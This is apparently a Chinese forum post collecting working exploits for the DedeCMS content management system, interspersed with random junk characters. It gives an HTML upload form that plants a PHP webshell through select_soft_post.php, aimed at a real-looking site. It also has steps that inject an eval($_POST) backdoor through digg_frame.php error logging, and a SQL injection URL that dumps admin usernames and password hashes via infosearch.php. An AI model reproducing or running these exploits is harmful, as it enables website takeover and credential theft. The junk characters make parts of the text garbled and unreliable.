1 u' X0 E+ @# u1 L3 g, f
! H) G5 k0 [+ W D, E& U
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
9 h# Q; c' d$ H8 d! @% ~$ ]<html>
! l$ J7 \2 T a( h7 @4 ^7 `1 A3 a<head>0 C$ A# h* ?' }/ J) _. ]1 B9 \7 `
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>& _/ O) j& s6 F! C. l
</head>
% H& f- Y ?: F! k' g<body style="FONT-SIZE: 9pt">' e: o% S7 G. b) a" N, g% ?
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />9 e. F( a0 i# ~; V5 H y2 C6 @
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
! Z% V' F( ^2 E% d1 I. x2 _/ n: c<input type='hidden' name='activepath' value='/data/cache/' />
$ r) y8 y) d+ N& l. F( t' S<input type='hidden' name='cfg_basedir' value='../../' />9 a6 w( D. x" \, j$ }
<input type='hidden' name='cfg_imgtype' value='php' />
3 a. _, ^$ M% G8 s6 e+ D+ F: W<input type='hidden' name='cfg_not_allowall' value='txt' />
1 M- Z4 {6 @- F2 F<input type='hidden' name='cfg_softtype' value='php' />
3 X+ y* x0 E/ T. @6 R<input type='hidden' name='cfg_mediatype' value='php' />3 `) Q4 K( _7 B/ U J, I- Q
<input type='hidden' name='f' value='form1.enclosure' />
* ]+ b' [% Q: N# d0 d. b7 J5 Y2 ?<input type='hidden' name='job' value='upload' />! m& F; n6 ~ v* }9 A2 x
<input type='hidden' name='newname' value='fly.php' />
# D. }$ m/ v9 DSelect U Shell <input type='file' name='uploadfile' size='25' />. {: [" T2 D0 y2 d
<input type='submit' name='sb1' value='确定' />
# Z: A# e; B/ B2 R</form>
; W3 _& P3 |0 |7 p4 G" T<br />It's just a exp for the bug of Dedecms V55...<br />4 Y, E/ ]# V9 ?( x; m J# d
Need register_globals = on...<br />) E: r: d6 N' W: {; K1 h* a6 U& p) ]
Fun the game,get a webshell at /data/cache/fly.php...<br />4 }7 U: y# ], [9 p5 X
</body>
# n; P' _, o [4 K</html>8 l2 H; b# s6 R: }3 ]
7 D6 ^* E1 G' k, l& m9 j
; `& C3 Z& u. D# @1 W+ P6 e
4 S6 U& T" x& {, b* X. x, y) a. W( T
' o% Y2 y7 Z( D) d; x9 [! u* u4 d
( s* @ ?6 y' L3 Z1 g
- @7 r( p( Q" C4 @& B' k( f+ V0 H1 G2 y/ ^6 |- F
Q3 t! u0 R* g* _9 n
; F: Y" \- O! H# U织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞# u. l+ g; e* ]) L# K# H* j
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。6 P) O2 I; @6 f% i
1. 访问网址:
' @9 z6 |5 |' }: V/ dhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>% Q$ {. G. l8 ?
可看见错误信息
! Y- p6 w! K2 t. @& t7 P" w# J0 @; ?! H
% ^9 [" U+ l+ A7 {+ @+ l0 o2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。) p- B; t+ p, o% I
int(3) Error: Illegal double '1024e1024' value found during parsing7 W6 l: j% B" D' N* o5 r) e
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>- u( j$ A# o! E, L# [7 O" W; [3 h
) w3 x# T, a: w0 m* ^
, [4 S6 ]" r7 C% Q6 Q) P3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是4 ]+ {2 y9 K/ V- L2 _6 ^; k
& j, X' \) G+ x! L: G8 \9 N+ l& q& Z( j
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
8 ~+ u& T, M" S( y9 | a u1 p4 j# {0 r; ]. v4 {8 p
+ u" X, P }% ?0 m- h$ e
按确定后的看到第2步骤的信息表示文件木马上传成功.4 d( x* S( u& V, G- Q2 z
3 J5 G% F) _( H- {- e
6 {. k, a4 R H$ \: K/ q
6 G) P; @* b2 S+ f1 }& v0 u
- _+ r; ?' Y5 j2 X2 Q/ b F7 ~1 N4 _. E1 u: u; n8 B% h [
9 e& Y6 B0 U& ]1 f2 ^, T# T7 Q* f- r& P
1 B S: b! R, A0 P# a" E
/ k( `) N/ a6 M
! R6 _ Q( n8 n+ R' p
+ {- w8 ?; A6 A- V+ f J$ k$ i' _# i! G s* e3 J
织梦(DedeCms)plus/infosearch.php 文件注入漏洞9 q4 C+ ?' |# a) ~6 h& g9 _
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|